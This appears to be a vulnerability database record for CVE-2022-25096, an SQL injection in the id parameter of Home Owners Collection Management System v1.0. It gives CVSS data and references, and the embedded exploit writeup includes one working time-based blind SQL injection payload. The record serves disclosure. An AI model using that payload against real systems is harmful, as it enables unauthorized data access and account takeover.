Description
Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in /members/view_member.php.
Affected Software
Related
{"id": "CVE-2022-25096", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2022-25096", "description": "Home Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in /members/view_member.php.", "published": "2022-02-26T00:15:00", "modified": "2022-03-08T14:57:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25096", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/50732", "https://www.nu11secur1ty.com/2022/02/home-owners-collection-management-10-rce.html", "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Home-Owners-Collection-Management"], "cvelist": ["CVE-2022-25096"], "immutableFields": [], "lastseen": "2022-03-23T10:26:03", "viewCount": 40, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-25029"]}, {"type": "zdt", "idList": ["1337DAY-ID-37430"]}]}, "score": {"value": 4.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-37430"]}]}, "vulnersScore": 4.7}, "_state": {"dependencies": 1659964613, "score": 1659965167}, "_internal": {"score_hash": "2c4dad4f1632806db90af9425ae4559c"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:home_owners_collection_management_system_project:home_owners_collection_management_system:1.0"], "cpe23": ["cpe:2.3:a:home_owners_collection_management_system_project:home_owners_collection_management_system:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "affectedSoftware": [{"cpeName": "home_owners_collection_management_system_project:home_owners_collection_management_system", "version": "1.0", "operator": "eq", "name": "home owners collection management system project home owners collection management system"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:home_owners_collection_management_system_project:home_owners_collection_management_system:1.0:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://www.exploit-db.com/exploits/50732", "name": "https://www.exploit-db.com/exploits/50732", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.nu11secur1ty.com/2022/02/home-owners-collection-management-10-rce.html", "name": "https://www.nu11secur1ty.com/2022/02/home-owners-collection-management-10-rce.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Home-Owners-Collection-Management", "name": "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Home-Owners-Collection-Management", "refsource": "MISC", "tags": ["Third Party Advisory"]}]}
{"zdt": [{"lastseen": "2022-03-08T16:05:02", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "zdt", "title": "Owners Collection Management System v1.0 SQL - Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-25096"], "modified": "2022-02-28T00:00:00", "id": "1337DAY-ID-37430", "href": "https://0day.today/exploit/description/37430", "sourceData": "## Title: Owners Collection Management System v1.0 SQL - Injections \n## Author: nu11secur1ty\n## Vendor: https://www.sourcecodester.com/users/tips23\n## Software: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html\n## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-25096\n\n## Description:\nHome Owners Collection Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in /members/view_member.php.\nThe `id` parameter from Owners Collection Management System v1.0 appears to be vulnerable to SQL injection attacks. \nThe attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.\n\nStatus: CRITICAL\n\n[+] Payloads:\n\n```mysql\n---\nParameter: id (GET)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=0' AND (SELECT 4743 FROM (SELECT(SLEEP(5)))BjBt)-- ogKy&page=members/view_member\n---\n\n```\n\n## Reproduce:\n[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-25096)\n\n## Proof and Exploit:\n[href](https://streamable.com/y6qdio)\n", "sourceHref": "https://0day.today/exploit/37430", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-06-13T19:08:00", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2022-25096. Reason: This candidate is a duplicate of CVE-2022-25096. Notes: All CVE users should reference CVE-2022-25096 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.", "cvss3": {}, "published": "2022-02-28T23:15:00", "type": "cve", "title": "CVE-2022-25029", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-25029", "CVE-2022-25096"], "modified": "2022-06-13T17:15:00", "cpe": [], "id": "CVE-2022-25029", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25029", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}]}
CVE-2022-25096
